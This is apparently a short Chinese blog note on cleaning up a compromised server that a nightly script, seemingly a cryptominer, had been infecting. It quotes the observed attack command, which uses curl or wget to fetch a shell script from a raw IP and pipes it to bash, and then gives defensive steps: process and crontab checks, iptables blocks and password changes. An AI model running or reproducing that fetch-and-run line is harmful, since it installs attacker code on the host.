服务器安全
监控
今天上云监控,发现每天凌晨都被人拉脚本进去安装,赶紧找方法把它给干了
sh -c [ -f \"/bin/bash\" ] && (curl -s http://194.38.20.199/ph.sh||wget -q -O- http://194.38.20.199/ph.sh)|bash || (curl -s http://194.38.20.199/ph2.sh||wget -q -O- http://194.38.20.199/ph2.sh)|sh
排查
CPU 排查
CPU 进程使用htop
查询,GPU 等使用gputstat
或者nvtop
进行查询。
查询启动进程
# 查看有无奇怪的启动命令
crontab -l
cat /etc/crontab
解决措施
禁止 ip
iptables -A OUTPUT -d 195.3.146.118 -j DROP
iptables -A OUTPUT -d 194.38.20.199 -j DROP
2021年8月9日 06:38:59更新,补充大致措施
1️⃣ 看看有没有还在跑的程序,如果有的话,kill掉它
2️⃣ 看看自启动中有没有奇怪的东西
3️⃣ 禁止ip,ip你也得看挖矿程序是想配置哪些ip的
4️⃣ 看看它是拿什么帐号登上来,把密码改一下,可能是密码泄露了。
5️⃣ Btw,看看自己服务器的安全等级是否足够,比如说限制root登录,禁止一些不用的端口之类的。